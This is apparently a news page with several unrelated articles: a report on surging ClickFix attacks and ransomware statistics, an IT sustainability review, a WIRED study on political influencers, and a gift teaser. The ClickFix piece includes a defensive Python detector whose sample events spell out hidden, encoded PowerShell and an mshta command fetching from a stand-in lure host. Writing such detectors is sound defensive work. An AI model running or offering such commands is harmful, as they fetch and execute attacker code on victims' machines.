ClickFix attacks that bypass cyber controls on the rise | Computer Weekly


So-called ClickFix or ClearFake attacks that bypass security controls and use unwitting victims to execute a cyber attack of their own accord are surging at the end of 2025, even outpacing phishing or clickjacking attacks, according to NCC Group’s latest monthly threat report.

First identified a couple of years ago, ClickFix attacks flooded the threat landscape during 2024, and their volume surged by over 500% in the first six months of 2025, said NCC.

Rather than relying on automated exploits or malicious attachments, ClickFix attacks exploit human fallibility. Targets are lured to compromised websites that display fake prompts instructing them to copy a command into their Run dialogue or PowerShell window, so the victims manually execute the attack themselves using tools like PowerShell, the Windows Run box, or other shell utilities.

NCC said such attacks represent a marked shift in social engineering because the victims are acting entirely voluntarily – this is in contrast to phishing attacks in which the deception ends once credentials have been submitted, or clickjacking, where victims unknowingly engage.

“This shift challenges traditional detection models as the command originates from a trusted user process, rather than an untrusted download or exploit chain,” wrote the NCC team.

“Understanding and mitigating ClickFix attacks is crucial because it can bypass conventional defences,” they said. “Email filters, sandboxing and automated URL analysers cannot always flag a malicious action that is conducted manually by an end user. Once the payload is executed, attackers can deploy RATs, enabling persistence, credential harvesting and eventual ransomware deployment.”

Financially motivated cyber criminals have been quick to climb on board the ClickFix wagon, many of them operating in larger access broker ecosystems to sell on compromised endpoints to ransomware gangs.

The report details a number of such targeted ClickFix operations. One campaign, active from April 2025 until just a couple of months ago, targeted the hospitality sector and duped employees into spreading infostealer malware across multiple hotel chains. This campaign used the PureRAT remote access trojan (RAT) to steal the hotels’ Booking.com credentials and conduct downstream email and WhatsApp phishing attacks against guests.

Another campaign, run by Kimsuky, a North Korean state threat actor, prompted its victims to copy and paste bogus authentication codes into PowerShell after posing as a US national security aide trying to set up meetings on South Korean issues.

Defending against ClickFix attacks is largely a matter of attempting to cut down on an organisation’s exposure to malicious lures and deceptive landing sites by incorporating tools such as URL filtering, domain reputation controls, web-filtering and sandboxing. Tightening endpoint execution environments is also a must, as is strengthening user awareness and instructing all employees to treat any unsolicited copy-paste instruction as an attempted cyber attack.
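As an added illustration (not taken from the NCC report or this article), one way to look for the Run-dialogue variant in endpoint telemetry is to flag script interpreters started directly by `explorer.exe`, which is how Windows launches anything typed into the Run box, when the command line carries a URL, a hidden-window flag or an encoded command. The event field names, the interpreter watch list and the sample events are assumptions constructed for this sketch; commands pasted into an already open PowerShell window are not covered by it.

```python
import re

# Assumed watch list: interpreters a pasted Run-dialog command usually starts.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits that are unusual for something a user typed by hand.
TRAITS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w[a-z]*\s+h[a-z]*", re.I),
    "encoded_command": re.compile(r"(?<!\S)-e[a-z]*\s+[A-Za-z0-9+/=]{16,}", re.I),
}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the traits that make one process-creation event suspicious."""
    # The Run dialog starts programs as children of explorer.exe.
    if basename(event["parent_image"]) != "explorer.exe":
        return []
    if basename(event["image"]) not in INTERPRETERS:
        return []
    return [name for name, rx in TRAITS.items() if rx.search(event["command_line"])]

def triage(events):
    """Return (host, user, traits) for every event with at least one trait."""
    hits = []
    for ev in events:
        traits = score_event(ev)
        if traits:
            hits.append((ev["host"], ev["user"], traits))
    return hits

# Constructed sample events: hypothetical schema, placeholder hosts and payloads.
EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "WS-001", "user": "reception", "parent_image": EXPLORER, "image": PS,
     "command_line": "powershell.exe -w hidden -enc PLACEHOLDERBASE64PAYLOAD0000===="},
    {"host": "WS-002", "user": "nightshift", "parent_image": EXPLORER,
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://lure.example.invalid/verify"},
    {"host": "WS-003", "user": "itadmin", "parent_image": EXPLORER, "image": PS,
     "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    {"host": "WS-004", "user": "SYSTEM", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": PS, "command_line": "powershell.exe -c https://updates.example.invalid/check"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The third and fourth events stay quiet by design: a hand-typed script launch with no suspicious trait, and an interpreter whose parent is not the user's shell and so belongs to a different rule.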

Ransomware stats

The growth in ClickFix attacks came amid a plateauing of general cyber attack volumes during the past few weeks, with tracked ransomware hits falling 2% in November, NCC found.

The Qilin operation held firm as the most active gang observed in NCC’s telemetry, accounting for 101 attacks, followed by Cl0p with 98, Akira with 81, and INC Ransom with 49.

Additionally notable in November was the DragonForce gang – NCC attributed 19 attacks to it during the period, although it has claimed many more itself – which became one of the more prominent active cyber gangs this year thanks to its reliance on collaboration with highly skilled affiliates, among them Scattered Spider, the hacking collective that hit Marks & Spencer, among many others.

Although collaboration between threat actors is nothing new, NCC said that DragonForce’s activity showed how gangs can maximise such strategies to strengthen their capabilities.

That said, DragonForce has also taken something of a sledgehammer to the concept of honour among thieves. In May, it was observed hacking and defacing the data leak sites of rival gangs, and at one point initiated a hostile takeover bid of the RansomHub crew.

NCC said this competitiveness may reflect the lowering of technical barriers to participation in the cyber criminal ecosystem. Attacking competitors, it suggested, may form part of a deterrence strategy to keep newcomers from establishing themselves.

Don’t be complacent

“Business leaders cannot afford to become complacent,” said Matt Hull, NCC global head of threat intel. “Threat groups are rapidly evolving, sharing tools and techniques, and already exploiting the festive period, when vigilance often drops.

“With the new Cyber Security and Resilience Bill and high-profile breaches at M&S, Co-op and JLR [Jaguar Land Rover] this year, organisations are under growing scrutiny to prove they have robust defences and incident response plans in place,” he added.

“As the holidays approach, staying alert to suspicious activity and strengthening security posture is as important as ever.”



IT Sustainability Think Tank: How IT sustainability entered the mandate era during 2025 | Computer Weekly


As the calendar turns the final pages on 2025, the information technology sector stands at a critical juncture regarding its environmental commitments. This year was not marked by technological breakthroughs solving decarbonisation, but by the decisive maturation of sustainability from a strategic differentiator into an operational and regulatory imperative.

This transition involved a painful reckoning with data complexity, supply chain reality, and the sheer energy appetite of modern computing, driven primarily by the rapid proliferation of artificial intelligence (AI).

We entered 2025 with goals framed by aspiration; we exit under the binding mandate of actuality. The central shift is profound: IT sustainability is no longer a parallel environmental, social and governance (ESG) initiative.

It has become deeply intertwined with core business continuity, geopolitical supply chain risk, and mandatory financial disclosure. While this shift signals progress, momentum is driven more by necessity and the threat of liability than by shared ethical commitment.

The conversation evolves from aspirational to accountable

The most profound shift over the past year has been the forced elevation of the sustainability dialogue directly onto the executive committee’s core risk portfolio. This movement is not voluntary; it is driven by impending regulation and the sobering realisation that environmental failure now carries direct, auditable financial penalties and board-level liability.

Only a year ago, discussions circled around unquantifiable reputational benefits. Today, the lexicon is dominated by acronyms signalling mandatory compliance: CSDDD, CSRD, and the tightening of the SBTi Net-Zero Standard V2. These frameworks compel executives to move past narratives and confront the granular, auditable data attached to every asset, vendor, and cloud usage.

For the CIO, this manifests in two critical areas. First, energy efficiency is decisively reframed as a cost of doing business, crucial for operational expenditure control amid volatile global energy markets. Second, the sudden energy demand of generative AI has triggered a rapid, internal debate on responsible compute architecture.

Leaders are increasingly compelled to justify AI investment not solely on traditional ROI, but via a nascent “return on compute” model that necessarily integrates and accounts for carbon expenditure. This makes the environmental cost of IT an integrated input in the total cost of ownership calculation, rather than a polite footnote.

Despite this high-level engagement, progress remains complicated. The IT function often lacks the authority to enforce change across complex internal silos, and the necessary budget and risk tolerance for truly transformative shifts remain stubbornly limited.

Genuine progress where the green shoots are taking hold

Despite systemic inertia, 2025 delivered solid, tangible progress in certain operational domains, offering a partial blueprint for future net-zero efforts. Our confidence is bolstered by three examples, though it is crucial to understand that wide-scale adoption across the average enterprise remains nascent and often confined to pilot programs:

1. Decoupling cloud growth from carbon: Hyperscale cloud providers have largely won the battle for renewable energy procurement. The next frontier — optimising physical operations — has seen enterprise engagement. We saw accelerated adoption of advanced liquid cooling technologies (still primarily concentrated in hyperscale environments, but critical for future AI scaling). Enterprises optimising workloads for low-carbon regions and utilising serverless architectures successfully decoupled rapid cloud expansion from a proportional rise in emissions. This success belongs predominantly to the hyperscalers, and enterprise optimisation remains an ongoing campaign.

2. Maturing the circular IT model (As-a-Service): The year 2025 saw the Managed Device-as-a-Service (MDaaS) model transition into a critical environmental enabler. By outsourcing the entire device lifecycle, enterprises commit practically to refurbishment and robust reverse logistics. Successful enterprises leverage these contracts to guarantee asset re-entry into the value chain via certified refurbishment, drastically reducing e-waste. The caveats are two-fold: MDaaS adoption is far from universal, and the verification of these circular chains still lacks necessary, robust third-party scrutiny.

3. The nascent rise of green software engineering: The formal emergence of green software engineering (GSE) is perhaps the most encouraging development. For too long, the environmental focus was only on hardware. This year, organisations began measuring code energy consumption — optimising algorithms and refactoring applications to reduce reliance on resource-intensive computing.

An important development this year was the publication of the W3C Web Sustainability Guidelines (WSG) Draft Note. Developed through a global, collaborative effort — in which I was pleased to participate — the guidelines offer a structured and internationally relevant set of best practices for reducing the environmental footprint of web products and services. While the scope focuses specifically on the web rather than the full breadth of enterprise IT, the Draft Note nonetheless represents a significant step forward for the industry.

The persistent gaps undermining net-zero momentum

For all the genuine acceleration, 2025 was equally defined by two persistent, critical gaps that threaten to derail net-zero pathways and demand urgent attention.

1. The Scope 3 emissions chasm: The most pervasive and frustrating gap remains the measurement and meaningful reduction of Scope 3 emissions, particularly from purchased goods and downstream asset end-of-life.

Despite regulatory urgency, the vast majority of enterprises still rely on highly aggregated, industry-average supplier data (spend-based or activity-based), which is neither auditable nor sufficient for mandatory disclosure. The necessary mechanism — detailed, granular product carbon footprints (PCF) provided by every vendor — is simply not available at scale or with sufficient fidelity.

The problem persists because it requires collaboration across complex, often proprietary global supply chains. Suppliers are reticent to disclose granular data, citing competitive concerns, while buyers lack the leverage to mandate it. The result is a ‘Scope 3 plateau’: targets are set, but underlying emissions remain stubbornly high, creating a significant credibility risk. We are still largely measuring a reflection, not the reality.

2. The generative AI energy debt: While AI is a powerful tool for sustainability optimisation, the immediate, unmanaged energy demand of Large Language Models (LLMs) represents a profound and growing gap. The speed of AI adoption, combined with the inherently expensive High-Performance Computing (HPC) required, creates an “energy debt” that offsets hard-won gains elsewhere.

The challenge is governance. Enterprises are deploying AI solutions without robust, mandatory policies on model selection, inference efficiency, or resource decommissioning. Crucially, most organisations remain focused on achieving initial ROI metrics, relegating energy efficiency to an optional performance tweak. Failure to enforce a framework for ‘responsible compute’ risks the transformative power of AI being negated by its own expanding environmental impact. This is the single greatest risk to the IT sector’s net-zero journey.

Strategic priorities for 2026 and beyond

As the IT Sustainability Think Tank looks towards 2026, the focus must shift from identifying the problem to systematically closing the remaining gaps with institutional discipline. We must treat these priorities as non-negotiable elements of future business resilience:

  1. Mandate data granularity for Scope 3: Leverage procurement influence to force supplier compliance on verifiable Product Carbon Footprints (PCF). The mandate must be non-negotiable, enforced with clear vendor scorecards and contractual requirements.
  2. Institutionalise green software engineering: Invest heavily in training and tooling to embed energy efficiency into the software development lifecycle (SDLC). Software architecture must be treated with the same environmental scrutiny as data centre cooling, making efficiency an audited requirement.
  3. Govern the AI energy cost: Implement a Responsible AI framework that includes mandatory energy consumption metrics and resource allocation policies for all Generative AI deployments.

The year 2025 was when IT sustainability moved into the board’s audit file. Next year must be the year we finally gather the granular data, enforce the necessary discipline, and manage the rapidly growing energy appetite of our own invention. The time for aspirational statements is definitively over; the urgent task now is to move these nascent efforts into full, verifiable accountability.



The Most Powerful Politics Influencers Barely Post About Politics


Donald Trump’s appearances on the podcasts of Joe Rogan and Theo Von, among others, were seen by many as a key part of securing his second term in office.

But while Trump was speculating about alien life on Mars with Rogan, he had a team of acolytes appearing on dozens, if not hundreds, of much smaller niche podcasts hosted by right-wing content creators who typically don’t talk about politics.

This is how, just six days before the election, Kash Patel, the man now struggling to run the FBI, ended up appearing on the Deplorable Discussions livestream, a fringe, QAnon-infused show hosted on a platform called Pilled.

“The Deep State exists,” Patel told the audience. “It’s a Democratic-Republican uniparty swamp monster machine.”

At the time, there was no hard evidence behind an idea the Trump campaign appeared to understand instinctively: Social media creators, especially those who do not typically speak about politics, have an extraordinary ability to sway their audiences.

Now we have that evidence.

A new report, shared exclusively with WIRED and published today by researchers from Columbia and Harvard, is a first-of-its-kind study designed to measure the impact influencers and online creators can have on their audiences.

The study was conducted with 4,716 Americans aged between 18 and 45, most of whom were randomly assigned a list of progressive content creators to follow. Over the course of five months, from August to December 2024, these creators produced nonpartisan content designed to educate followers rather than explicitly advocate for a specific political viewpoint.

The results showed that exposure to these progressive-minded creators not only increased general political knowledge, but also shifted followers’ policy and partisan views to the left.

In contrast, a placebo group that was not assigned any creators to follow but was allowed to scroll social media as normal “showed significant rightward movement,” which researchers said was related to the right-leaning nature of social media networks.

For the study’s authors, and experts who have reviewed the research, the findings confirm that not only are influencers now potentially more powerful than traditional media, but content creators who rarely share political content may be the most powerful of all.

“The research concretizes what a lot of people have been hypothesizing, which is that content creators are a powerful force in politics, and they are absolutely going to play a big role in the 2026 midterms, and they will play an even bigger role in the 2028 elections,” says Samuel Woolley, an associate professor at the University of Pittsburgh who studies digital propaganda and who reviewed the research.

The Politics Paradox

As well as trying to prove that social media influencers can shape public opinion, the researchers also wanted to find out if those creators were more or less influential when their content is more overtly political.

To do this, the researchers randomly assigned the study’s participants a list of creators to follow, with some being assigned creators who mainly post about political issues, while others were assigned creators who are predominantly apolitical in their output.



The Best Food Gifts for Every Type of Foodie



From tinned fish to baked goodies, you can deliver the best-tasting treats to their door—even if you don’t live close by.


